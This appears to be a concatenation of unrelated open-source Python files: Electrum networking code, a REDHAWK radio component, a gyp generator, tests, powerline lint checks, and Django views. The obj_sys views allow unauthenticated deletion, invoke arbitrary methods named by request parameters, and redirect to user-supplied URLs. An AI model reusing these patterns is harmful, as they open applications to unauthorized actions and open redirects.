s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True)
except ssl.SSLError, e:
s = None
if s and self.check_host_name(s.getpeercert(), self.host):
self.print_error("SSL certificate signed by CA")
return s
# get server certificate.
# Do not use ssl.get_server_certificate because it does not work with proxy
s = self.get_simple_socket()
if s is None:
return
try:
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None)
except ssl.SSLError, e:
self.print_error("SSL error retrieving SSL certificate:", e)
return
dercert = s.getpeercert(True)
s.close()
cert = ssl.DER_cert_to_PEM_cert(dercert)
# workaround android bug
cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
temporary_path = cert_path + '.temp'
with open(temporary_path,"w") as f:
f.write(cert)
else:
is_new = False
s = self.get_simple_socket()
if s is None:
return
if self.use_ssl:
try:
s = ssl.wrap_socket(s,
ssl_version=ssl.PROTOCOL_SSLv23,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs= (temporary_path if is_new else cert_path),
do_handshake_on_connect=True)
except ssl.SSLError, e:
self.print_error("SSL error:", e)
if e.errno != 1:
return
if is_new:
rej = cert_path + '.rej'
if os.path.exists(rej):
os.unlink(rej)
os.rename(temporary_path, rej)
else:
with open(cert_path) as f:
cert = f.read()
try:
b = pem.dePem(cert, 'CERTIFICATE')
x = x509.X509(b)
except:
traceback.print_exc(file=sys.stderr)
self.print_error("wrong certificate")
return
try:
x.check_date()
except:
self.print_error("certificate has expired:", cert_path)
os.unlink(cert_path)
return
self.print_error("wrong certificate")
return
except BaseException, e:
self.print_error(e)
if e.errno == 104:
return
traceback.print_exc(file=sys.stderr)
return
if is_new:
self.print_error("saving certificate")
os.rename(temporary_path, cert_path)
return s
def run(self):
socket = self.get_socket()
if socket:
self.print_error("connected")
self.queue.put((self.server, socket))
class Interface(util.PrintError):
"""The Interface class handles a socket connected to a single remote
electrum server. It's exposed API is:
- Member functions close(), fileno(), get_responses(), has_timed_out(),
ping_required(), queue_request(), send_requests()
- Member variable server.
"""
def __init__(self, server, socket):
self.server = server
self.host, _, _ = server.split(':')
self.socket = socket
self.pipe = util.SocketPipe(socket)
self.pipe.set_timeout(0.0) # Don't wait for data
# Dump network messages. Set at runtime from the console.
self.debug = False
self.unsent_requests = []
self.unanswered_requests = {}
# Set last ping to zero to ensure immediate ping
self.last_request = time.time()
self.last_ping = 0
self.closed_remotely = False
def diagnostic_name(self):
return self.host
def fileno(self):
# Needed for select
return self.socket.fileno()
def close(self):
if not self.closed_remotely:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self.socket.close()
def queue_request(self, *args): # method, params, _id
'''Queue a request, later to be send with send_requests when the
socket is available for writing.
'''
self.request_time = time.time()
self.unsent_requests.append(args)
def num_requests(self):
'''Keep unanswered requests below 100'''
n = 100 - len(self.unanswered_requests)
return min(n, len(self.unsent_requests))
def send_requests(self):
'''Sends queued requests. Returns False on failure.'''
make_dict = lambda (m, p, i): {'method': m, 'params': p, 'id': i}
n = self.num_requests()
wire_requests = self.unsent_requests[0:n]
try:
self.pipe.send_all(map(make_dict, wire_requests))
except socket.error, e:
self.print_error("socket error:", e)
return False
self.unsent_requests = self.unsent_requests[n:]
for request in wire_requests:
if self.debug:
self.print_error("-->", request)
self.unanswered_requests[request[2]] = request
return True
def ping_required(self):
'''Maintains time since last ping. Returns True if a ping should
be sent.
'''
now = time.time()
if now - self.last_ping > 60:
self.last_ping = now
return True
return False
def has_timed_out(self):
'''Returns True if the interface has timed out.'''
if (self.unanswered_requests and time.time() - self.request_time > 10
and self.pipe.idle_time() > 10):
self.print_error("timeout", len(self.unanswered_requests))
return True
return False
def get_responses(self):
'''Call if there is data available on the socket. Returns a list of
(request, response) pairs. Notifications are singleton
unsolicited responses presumably as a result of prior
subscriptions, so request is None and there is no 'id' member.
Otherwise it is a response, which has an 'id' member and a
corresponding request. If the connection was closed remotely
or the remote server is misbehaving, a (None, None) will appear.
'''
responses = []
while True:
try:
response = self.pipe.get()
except util.timeout:
break
if not type(response) is dict:
responses.append((None, None))
if response is None:
self.closed_remotely = True
self.print_error("connection closed remotely")
break
if self.debug:
self.print_error("<--", response)
wire_id = response.get('id', None)
if wire_id is None: # Notification
responses.append((None, response))
else:
request = self.unanswered_requests.pop(wire_id, None)
if request:
responses.append((request, response))
else:
self.print_error("unknown wire ID", wire_id)
responses.append((None, None)) # Signal
break
return responses
def check_cert(host, cert):
try:
b = pem.dePem(cert, 'CERTIFICATE')
x = x509.X509(b)
except:
traceback.print_exc(file=sys.stdout)
return
try:
x.check_date()
expired = False
except:
expired = True
m = "host: %s\n"%host
m += "has_expired: %s\n"% expired
util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
def test_certificates():
from simple_config import SimpleConfig
config = SimpleConfig()
mydir = os.path.join(config.path, "certs")
certs = os.listdir(mydir)
for c in certs:
print c
p = os.path.join(mydir,c)
with open(p) as f:
cert = f.read()
check_cert(c, cert)
if __name__ == "__main__":
test_certificates()
|
RedhawkSDR/FrontEndController | refs/heads/master | python/FrontEndController.py | 1 | #!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK FrontEndController.
#
# REDHAWK FrontEndController is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK FrontEndController is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# AUTO-GENERATED
#
# Source: FrontEndController.spd.xml
from ossie.resource import start_component
import logging
from FrontEndController_base import *
from ossie.utils import redhawk
import frontend
from redhawk.frontendInterfaces import FRONTEND
class FrontEndController_i(FrontEndController_base):
"""
This component was developed to support the REDHAWK LiveDVD. It also serves to provides a simple
example of FEI Allocations and connections. It was developed with REDHAWK 1.10.0.
"""
targetComponent=None
targetDevice=None
domain = None
targetComponentPort = None
targetDevicePort = None
feiTunerPort = None
connected = False
def initialize(self):
FrontEndController_base.initialize(self)
self.addPropertyChangeListener("TuneRequest", self.TuneRequest_changed)
def start(self):
FrontEndController_base.start(self)
if not self.connected:
self.connectAndTune()
def stop(self):
self._log.debug("Stop called.")
try:
if self.connected:
self.targetDevice.deallocateCapacity(self.allocationRequest)
self.targetDevicePort.disconnectPort(self.allocationId)
except:
self._log.error("Exception occurred while deallocating and disconnecting.")
finally:
self.connected = False
FrontEndController_base.stop(self)
def TuneRequest_changed(self, propid, oldval, newval):
self._log.debug("Received Tune Request Change")
self._log.debug("Currently Connected: " + str(self.connected))
if self.connected:
try:
if (oldval.frequency != newval.frequency):
self._log.debug("Trying to set frequency to: " + str(newval.frequency))
self.feiTunerPort.setTunerCenterFrequency(self.allocationId, newval.frequency*1e6)
if (oldval.sampleRate != newval.sampleRate):
self._log.debug("Trying to set sample rate to: " + str(newval.sampleRate))
self.feiTunerPort.setTunerOutputSampleRate(self.allocationId, newval.sampleRate*1e6)
except FRONTEND.BadParameterException as ex:
self._log.error("Bad Parameter Exception Thrown: " + str(ex))
except FRONTEND.NotSupportedException as ex:
self._log.error("Not Supported Exception Thrown: " + str(ex))
except FRONTEND.FrontendException as ex:
self._log.error("Front End Exception Thrown: " + str(ex))
except Exception as ex:
self._log.error("Failed to set property: " + str(ex))
finally:
self.TuneRequest.frequency = self.feiTunerPort.getTunerCenterFrequency(self.allocationId) / 1e6
self._log.debug("Actual frequency: " + str(self.TuneRequest.frequency))
self.TuneRequest.sampleRate = self.feiTunerPort.getTunerOutputSampleRate(self.allocationId) / 1e6
self._log.debug("Actual sample rate: " + str(self.TuneRequest.sampleRate))
def connectAndTune(self):
# Lets make sure we have everything we need before continuing.
if not self.InputComponent.componentName:
self._log.error("Stopping. Component name must be specified.")
self.stop()
return
if not self.InputComponent.inputPortName:
self._log.error("Stopping. Component input port name must be specified.")
self.stop()
return
if not self.FEIDevice.deviceName:
self._log.error("Stopping. Device name must be specified.")
self.stop()
return
if not self.FEIDevice.outputPortName:
self._log.error("Stopping. Device output port name must be specified.")
self.stop()
return
if not self.FEIDevice.tunerPortName:
self._log.error("Stopping. Device tuner port name must be specified.")
self.stop()
return
# While the domain port does give us a direct connection to the domain, the
# API exposed is cleaner from the domain instance returned via the redhawk.attach method.
try:
domainname = self.port_DomainManager_out._get_name()
self.domain = redhawk.attach(domainname)
except Exception as ex:
self._log.error("Failed to connect to domain: " + str(ex))
self.stop()
return
if self.domain is None:
self._log.error("Stopping. Could not connect to domain.")
self.stop()
return
self._log.debug("Searching for the current waveform in the domain")
waveform = self.findWaveformByComponentInstanceName(self._name)
if waveform is None:
self._log.error("Stopping. Could not find the running waveform.")
self.stop();
return
self._log.debug("Searching for the component in the waveform: " + str(waveform.name))
# Gets the component from the application. The component name can be the name or instantition. ex. DataConverter or DataConveter_3
# This allows you to use the same component multiple times in a waveform and know for certain which one you are connecting to.
for comp in waveform.comps:
if self.InputComponent.componentName in comp._instanceName:
self.targetComponent = comp
break
if self.targetComponent is None:
self._log.error("Stopping. Could not find the component: " + self.InputComponent.componentName)
self.stop();
return
self._log.debug("Searching device managers for device: " + self.FEIDevice.deviceName)
self.targetDevice = self.findByDeviceName(self.FEIDevice.deviceName)
if self.targetDevice is None:
self._log.error("Stopping. Could not find the device: " + self.FEIDevice.deviceName)
self.stop()
return
# Gets the references to the input and output ports
self.targetComponentPort = self.targetComponent.getPort(self.InputComponent.inputPortName)
self.targetDevicePort = self.targetDevice.getPort(self.FEIDevice.outputPortName)
self.feiTunerPort = self.targetDevice.getPort(self.FEIDevice.tunerPortName)
if self.targetComponentPort is None:
self._log.error("Stopping. Could not find the component input port: " + self.InputComponent.inputPortName)
self.stop()
return
if self.targetDevicePort is None:
self._log.error("Stopping. Could not find the component output port: " + self.FEIDevice.outputPortName)
self.stop()
return
if self.feiTunerPort is None:
self._log.error("Stopping. Could not find the tuner port: " + self.FEIDevice.tunerPortName)
self.stop()
return
self.allocationRequest = frontend.createTunerAllocation(
tuner_type = self.tunerType,
allocation_id = self.allocationId,
center_frequency = self.TuneRequest.frequency * 1e6,
sample_rate = self.TuneRequest.sampleRate * 1e6,
sample_rate_tolerance = 20.0
)
self._log.debug("Performing allocation of FEI Device")
self._log.debug("Allocation contains: " + str(self.allocationRequest))
retVal = False
try:
retVal = self.targetDevice.allocateCapacity(self.allocationRequest)
except CF.Device.InvalidCapacity as ex:
self._log.error("Device has invalid capacity, allocation failed: " + str(ex))
except CF.Device.InvalidState as ex:
self._log.error("Device in invalid state, allocation failed: " + str(ex))
except Exception as ex:
self._log.error("Exception thrown while allocating: " + str(ex))
if (retVal is False):
self._log.error("Allocation failed. Stopping.")
self.stop()
return
self._log.debug("Allocation succeeded!")
# Makes the actual connection
self._log.debug("Connecting component and device ports")
self.targetDevicePort.connectPort(self.targetComponentPort, self.allocationId)
self.connected = True
self._log.debug("Starting device and component")
# Make sure device and component are started
self.targetDevice.start()
self.targetComponent.start()
# This component does no processing so we can just return FINISH so
# the process method does not get called again.
def process(self):
return FINISH
def findWaveformByComponentInstanceName(self, name):
# Gets a reference to the running application
for app in self.domain.apps:
# Find desired application
for comp in app.comps:
self._log.trace("Checking if " + name + " is in " + comp._instanceName)
if name in comp._instanceName:
return app
return None
def findByDeviceName(self, dev_name):
for devMgr in self.domain.devMgrs:
for dev in devMgr.devs:
self._log.trace("Checking if " + dev_name + " is in " + dev._instanceName)
if dev_name in dev._instanceName:
return dev
return None
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
logging.debug("Starting Component")
start_component(FrontEndController_i)
|
Whatsit2yaa/vast-tundra-84597 | refs/heads/master | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/gypd.py | 1824 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypd output module
This module produces gyp input as its output. Output files are given the
.gypd extension to avoid overwriting the .gyp files that they are generated
from. Internal references to .gyp files (such as those found in
"dependencies" sections) are not adjusted to point to .gypd files instead;
unlike other paths, which are relative to the .gyp or .gypd file, such paths
are relative to the directory from which gyp was run to create the .gypd file.
This generator module is intended to be a sample and a debugging aid, hence
the "d" for "debug" in .gypd. It is useful to inspect the results of the
various merges, expansions, and conditional evaluations performed by gyp
and to see a representation of what would be fed to a generator module.
It's not advisable to rename .gypd files produced by this module to .gyp,
because they will have all merges, expansions, and evaluations already
performed and the relevant constructs not present in the output; paths to
dependencies may be wrong; and various sections that do not belong in .gyp
files such as such as "included_files" and "*_excluded" will be present.
Output will also be stripped of comments. This is not intended to be a
general-purpose gyp pretty-printer; for that, you probably just want to
run "pprint.pprint(eval(open('source.gyp').read()))", which will still strip
comments but won't do all of the other things done to this module's output.
The specific formatting of the output generated by this module is subject
to change.
"""
import gyp.common
import errno
import os
import pprint
# These variables should just be spit back out as variable references.
_generator_identity_variables = [
'CONFIGURATION_NAME',
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'LIB_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
'SHARED_LIB_DIR',
'SHARED_LIB_PREFIX',
'SHARED_LIB_SUFFIX',
'STATIC_LIB_PREFIX',
'STATIC_LIB_SUFFIX',
]
# gypd doesn't define a default value for OS like many other generator
# modules. Specify "-D OS=whatever" on the command line to provide a value.
generator_default_variables = {
}
# gypd supports multiple toolsets
generator_supports_multiple_toolsets = True
# TODO(mark): This always uses <, which isn't right. The input module should
# notify the generator to tell it which phase it is operating in, and this
# module should use < for the early phase and then switch to > for the late
# phase. Bonus points for carrying @ back into the output too.
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
output_files = {}
for qualified_target in target_list:
[input_file, target] = \
gyp.common.ParseQualifiedTarget(qualified_target)[0:2]
if input_file[-4:] != '.gyp':
continue
input_file_stem = input_file[:-4]
output_file = input_file_stem + params['options'].suffix + '.gypd'
if not output_file in output_files:
output_files[output_file] = input_file
for output_file, input_file in output_files.iteritems():
output = open(output_file, 'w')
pprint.pprint(data[input_file], output)
output.close()
|
srottem/indy-sdk | refs/heads/master | wrappers/python/tests/pool/test_create_pool_ledger_config.py | 3 | import pytest
from indy import pool
from indy.error import ErrorCode, IndyError
@pytest.mark.asyncio
async def test_create_pool_ledger_config_works(pool_ledger_config):
pass
@pytest.mark.asyncio
async def test_create_pool_ledger_config_works_for_empty_name():
with pytest.raises(IndyError) as e:
await pool.create_pool_ledger_config("", None)
assert ErrorCode.CommonInvalidParam2 == e.value.error_code
|
weijia/obj_sys | refs/heads/master | obj_sys/views.py | 1 | # Create your views here.
from obj_tagging import *
from obj_operator import ObjOperator, ObjListOperator, handle_operation_request
from djangoautoconf.django_utils import retrieve_param
from models import UfsObj
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
log = logging.getLogger(__name__)
@login_required
def manager(request):
data = retrieve_param(request)
c = {"user": request.user, "tree": {"name": "left_tree", "url": "/custom_collections/jstree/?node="}}
c.update(csrf(request))
return render_to_response('obj_sys/manager.html', c)
def query(request):
c = {"user": request.user}
c.update(csrf(request))
return render_to_response('obj_sys/query.html', c)
def get_parent(request):
ufs_url = retrieve_param(request)["ufs_url"]
res = {"meta": {"limit": 20, "next": None, "offset": 0, "previous": None, "total_count": 1},
"objects": [{"parent": UfsObj.objects.get(ufs_url=ufs_url).parent.ufs_url}]}
return JsonResponse(res)
def rm_objects_for_path(request):
data = retrieve_param(request)
cnt = 0
if "ufs_url" in data:
res = []
prefix = data["ufs_url"]
if prefix[-1] != "/":
prefix += "/"
for i in UfsObj.objects.filter(ufs_url__startswith=prefix):
if cnt < 100:
res.append(i.full_path)
else:
break
cnt += 1
#Remove tags first?
#TaggedItem.objects.filter(object__ufs_url__startswith=data["ufs_url"]).delete()
UfsObj.objects.filter(ufs_url__startswith=prefix).delete()
return HttpResponse(res, mimetype="application/json")
@login_required
def listing_with_description(request):
data = retrieve_param(request)
ufs_obj_type = int(data.get("type", "1"))
objects = UfsObj.objects.filter(user=request.user, valid=True, ufs_obj_type=ufs_obj_type).order_by('-last_modified')
return render_to_response('obj_sys/listing_with_description_in_bootstrap.html',
{"objects": objects, "request": request, "title": "My bookmarks",
"email": "richardwangwang@gmail.com", "author": "Richard"},
context_instance=RequestContext(request))
@login_required
def do_operation(request):
data = retrieve_param(request)
if ("cmd" in data) and ("pk" in data):
operator = ObjOperator(int(data["pk"]))
getattr(operator, data["cmd"])()
next_url = "/obj_sys/homepage/"
if "next_url" in data:
next_url = data["next_url"]
for param in data:
if param not in ["cmd", "pk", "next_url"]:
next_url += "&%s=%s" % (param, data[param])
return HttpResponseRedirect(next_url)
@login_required
def do_json_operation(request):
return handle_operation_request(request) |
CSCI1200Course/csci1200OnlineCourse | refs/heads/master | tests/unit/models_transforms.py | 5 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the transforms functions."""
__author__ = 'John Orr (jorr@google.com)'
import datetime
import unittest
from models import transforms
def wrap_properties(properties):
return {'properties': properties}
class JsonToDictTests(unittest.TestCase):
def test_missing_optional_fields_are_allowed(self):
schema = wrap_properties(
{'opt_field': {'type': 'boolean', 'optional': 'true'}})
result = transforms.json_to_dict({}, schema)
self.assertEqual(len(result), 0)
def test_missing_required_fields_are_rejected(self):
schema = wrap_properties(
{'req_field': {'type': 'boolean', 'optional': 'false'}})
try:
transforms.json_to_dict({}, schema)
self.fail('Expected ValueError')
except ValueError as e:
self.assertEqual(str(e), 'Missing required attribute: req_field')
schema = wrap_properties(
{'req_field': {'type': 'boolean'}})
try:
transforms.json_to_dict({}, schema)
self.fail('Expected ValueError')
except ValueError as e:
self.assertEqual(str(e), 'Missing required attribute: req_field')
def test_convert_boolean(self):
schema = wrap_properties({'field': {'type': 'boolean'}})
source = {'field': True}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(result['field'], True)
def test_convert_string_to_boolean(self):
schema = wrap_properties({'field': {'type': 'boolean'}})
source = {'field': 'true'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(result['field'], True)
def test_reject_bad_boolean(self):
schema = wrap_properties({'field': {'type': 'boolean'}})
source = {'field': 'cat'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(str(e), 'Bad boolean value for field: cat')
def test_convert_number(self):
schema = wrap_properties({'field': {'type': 'number'}})
source = {'field': 3.14}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(result['field'], 3.14)
def test_convert_string_to_number(self):
schema = wrap_properties({'field': {'type': 'number'}})
source = {'field': '3.14'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(result['field'], 3.14)
def test_reject_bad_number(self):
schema = wrap_properties({'field': {'type': 'number'}})
source = {'field': 'cat'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(str(e), 'could not convert string to float: cat')
def test_convert_date(self):
schema = wrap_properties({'field': {'type': 'date'}})
source = {'field': '2005/03/01'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(result['field'], datetime.date(2005, 3, 1))
source = {'field': '2005-03-01'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(result['field'], datetime.date(2005, 3, 1))
def test_reject_bad_dates(self):
schema = wrap_properties({'field': {'type': 'date'}})
source = {'field': '2005/02/31'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(str(e), 'day is out of range for month')
schema = wrap_properties({'field': {'type': 'date'}})
source = {'field': 'cat'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(
str(e), 'time data \'cat\' does not match format \'%s\'' %
transforms.ISO_8601_DATE_FORMAT)
def test_convert_datetime(self):
schema = wrap_properties({'field': {'type': 'datetime'}})
source = {'field': '2005/03/01 20:30'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(len(result), 1)
self.assertEqual(
result['field'], datetime.datetime(2005, 3, 1, 20, 30, 0))
source = {'field': '2005-03-01 20:30:19'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(
result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19))
source = {'field': '2005-03-01 20:30:19Z'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(
result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19))
source = {'field': '2005-03-01T20:30:19.123456Z'}
result = transforms.json_to_dict(source, schema)
self.assertEqual(
result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19, 123456))
def test_reject_bad_datetimes(self):
schema = wrap_properties({'field': {'type': 'datetime'}})
source = {'field': '2005/02/31 20:30'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(str(e), 'day is out of range for month')
schema = wrap_properties({'field': {'type': 'datetime'}})
source = {'field': 'cat'}
try:
transforms.json_to_dict(source, schema)
self.fail('Expected ValueException')
except ValueError as e:
self.assertEqual(
str(e),
'time data \'cat\' does not match format \'%s\'' %
transforms.ISO_8601_DATETIME_FORMAT)
def test_nulls(self):
for type_name in transforms.JSON_TYPES:
schema = wrap_properties({'field': {'type': type_name}})
source = {'field': None}
ret = transforms.json_to_dict(source, schema,
permit_none_values=True)
self.assertIn('field', ret)
self.assertIsNone(ret['field'])
class StringValueConversionTests(unittest.TestCase):
def test_value_to_string(self):
assert transforms.value_to_string(True, bool) == 'True'
assert transforms.value_to_string(False, bool) == 'False'
assert transforms.value_to_string(None, bool) == 'False'
def test_string_to_value(self):
assert transforms.string_to_value('True', bool)
assert transforms.string_to_value('1', bool)
assert transforms.string_to_value(1, bool)
assert not transforms.string_to_value('False', bool)
assert not transforms.string_to_value('0', bool)
assert not transforms.string_to_value('5', bool)
assert not transforms.string_to_value(0, bool)
assert not transforms.string_to_value(5, bool)
assert not transforms.string_to_value(None, bool)
assert transforms.string_to_value('15', int) == 15
assert transforms.string_to_value(15, int) == 15
assert transforms.string_to_value(None, int) == 0
assert transforms.string_to_value('foo', str) == 'foo'
assert transforms.string_to_value(None, str) == str('')
class JsonParsingTests(unittest.TestCase):
def test_json_trailing_comma_in_dict_fails(self):
json_text = '{"foo": "bar",}'
try:
transforms.loads(json_text)
raise Exception('Expected to fail')
except ValueError:
pass
def test_json_trailing_comma_in_array_fails(self):
json_text = '{"foo": ["bar",]}'
try:
transforms.loads(json_text)
raise Exception('Expected to fail')
except ValueError:
pass
def test_non_strict_mode_parses_json(self):
json_text = '{"foo": "bar", "baz": ["bum",],}'
_json = transforms.loads(json_text, strict=False)
assert _json.get('foo') == 'bar'
|
S0lll0s/powerline | refs/heads/develop | powerline/lint/checks.py | 17 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
import re
import logging
from collections import defaultdict
from powerline.lib.threaded import ThreadedSegment
from powerline.lib.unicode import unicode
from powerline.lint.markedjson.markedvalue import MarkedUnicode
from powerline.lint.markedjson.error import DelayedEchoErr, Mark
from powerline.lint.selfcheck import havemarks
from powerline.lint.context import JStr, list_themes
from powerline.lint.imp import WithPath, import_function, import_segment
from powerline.lint.spec import Spec
from powerline.lint.inspect import getconfigargspec
list_sep = JStr(', ')
generic_keys = set((
'exclude_modes', 'include_modes',
'exclude_function', 'include_function',
'width', 'align',
'name',
'draw_soft_divider', 'draw_hard_divider',
'priority',
'after', 'before',
'display'
))
type_keys = {
'function': set(('function', 'args', 'draw_inner_divider')),
'string': set(('contents', 'type', 'highlight_groups', 'divider_highlight_group')),
'segment_list': set(('function', 'segments', 'args', 'type')),
}
required_keys = {
'function': set(('function',)),
'string': set(()),
'segment_list': set(('function', 'segments',)),
}
highlight_keys = set(('highlight_groups', 'name'))
def get_function_strings(function_name, context, ext):
if '.' in function_name:
module, function_name = function_name.rpartition('.')[::2]
else:
module = context[0][1].get(
'default_module', MarkedUnicode('powerline.segments.' + ext, None))
return module, function_name
def check_matcher_func(ext, match_name, data, context, echoerr):
havemarks(match_name)
import_paths = [os.path.expanduser(path) for path in context[0][1].get('common', {}).get('paths', [])]
match_module, separator, match_function = match_name.rpartition('.')
if not separator:
match_module = 'powerline.matchers.{0}'.format(ext)
match_function = match_name
with WithPath(import_paths):
try:
func = getattr(__import__(str(match_module), fromlist=[str(match_function)]), str(match_function))
except ImportError:
echoerr(context='Error while loading matcher functions',
problem='failed to load module {0}'.format(match_module),
problem_mark=match_name.mark)
return True, False, True
except AttributeError:
echoerr(context='Error while loading matcher functions',
problem='failed to load matcher function {0}'.format(match_function),
problem_mark=match_name.mark)
return True, False, True
if not callable(func):
echoerr(context='Error while loading matcher functions',
problem='loaded “function” {0} is not callable'.format(match_function),
problem_mark=match_name.mark)
return True, False, True
if hasattr(func, 'func_code') and hasattr(func.func_code, 'co_argcount'):
if func.func_code.co_argcount != 1:
echoerr(
context='Error while loading matcher functions',
problem=(
'function {0} accepts {1} arguments instead of 1. '
'Are you sure it is the proper function?'
).format(match_function, func.func_code.co_argcount),
problem_mark=match_name.mark
)
return True, False, False
def check_ext(ext, data, context, echoerr):
havemarks(ext)
hadsomedirs = False
hadproblem = False
if ext not in data['lists']['exts']:
hadproblem = True
echoerr(context='Error while loading {0} extension configuration'.format(ext),
context_mark=ext.mark,
problem='extension configuration does not exist')
else:
for typ in ('themes', 'colorschemes'):
if ext not in data['configs'][typ] and not data['configs']['top_' + typ]:
hadproblem = True
echoerr(context='Error while loading {0} extension configuration'.format(ext),
context_mark=ext.mark,
problem='{0} configuration does not exist'.format(typ))
else:
hadsomedirs = True
return hadsomedirs, hadproblem
def check_config(d, theme, data, context, echoerr):
if len(context) == 4:
ext = context[-2][0]
else:
# local_themes
ext = context[-3][0]
if ext not in data['lists']['exts']:
echoerr(context='Error while loading {0} extension configuration'.format(ext),
context_mark=ext.mark,
problem='extension configuration does not exist')
return True, False, True
if (
(ext not in data['configs'][d] or theme not in data['configs'][d][ext])
and theme not in data['configs']['top_' + d]
):
echoerr(context='Error while loading {0} from {1} extension configuration'.format(d[:-1], ext),
problem='failed to find configuration file {0}/{1}/{2}.json'.format(d, ext, theme),
problem_mark=theme.mark)
return True, False, True
return True, False, False
def check_top_theme(theme, data, context, echoerr):
havemarks(theme)
if theme not in data['configs']['top_themes']:
echoerr(context='Error while checking extension configuration (key {key})'.format(key=context.key),
context_mark=context[-2][0].mark,
problem='failed to find top theme {0}'.format(theme),
problem_mark=theme.mark)
return True, False, True
return True, False, False
def check_color(color, data, context, echoerr):
havemarks(color)
if (color not in data['colors_config'].get('colors', {})
and color not in data['colors_config'].get('gradients', {})):
echoerr(
context='Error while checking highlight group in colorscheme (key {key})'.format(
key=context.key),
problem='found unexistent color or gradient {0}'.format(color),
problem_mark=color.mark
)
return True, False, True
return True, False, False
def check_translated_group_name(group, data, context, echoerr):
return check_group(group, data, context, echoerr)
def check_group(group, data, context, echoerr):
havemarks(group)
if not isinstance(group, unicode):
return True, False, False
colorscheme = data['colorscheme']
ext = data['ext']
configs = None
if ext:
def listed_key(d, k):
try:
return [d[k]]
except KeyError:
return []
if colorscheme == '__main__':
colorscheme_names = set(data['ext_colorscheme_configs'][ext])
colorscheme_names.update(data['top_colorscheme_configs'])
colorscheme_names.discard('__main__')
configs = [
(
name,
listed_key(data['ext_colorscheme_configs'][ext], name)
+ listed_key(data['ext_colorscheme_configs'][ext], '__main__')
+ listed_key(data['top_colorscheme_configs'], name)
)
for name in colorscheme_names
]
else:
configs = [
(
colorscheme,
listed_key(data['ext_colorscheme_configs'][ext], colorscheme)
+ listed_key(data['ext_colorscheme_configs'][ext], '__main__')
+ listed_key(data['top_colorscheme_configs'], colorscheme)
)
]
else:
try:
configs = [(colorscheme, [data['top_colorscheme_configs'][colorscheme]])]
except KeyError:
pass
hadproblem = False
for new_colorscheme, config_lst in configs:
not_found = []
new_data = data.copy()
new_data['colorscheme'] = new_colorscheme
for config in config_lst:
havemarks(config)
try:
group_data = config['groups'][group]
except KeyError:
not_found.append(config.mark.name)
else:
proceed, echo, chadproblem = check_group(
group_data,
new_data,
context,
echoerr,
)
if chadproblem:
hadproblem = True
if not proceed:
break
if not_found and len(not_found) == len(config_lst):
echoerr(
context='Error while checking group definition in colorscheme (key {key})'.format(
key=context.key),
problem='name {0} is not present anywhere in {1} {2} {3} colorschemes: {4}'.format(
group, len(not_found), ext, new_colorscheme, ', '.join(not_found)),
problem_mark=group.mark
)
hadproblem = True
return True, False, hadproblem
def check_key_compatibility(segment, data, context, echoerr):
havemarks(segment)
segment_type = segment.get('type', MarkedUnicode('function', None))
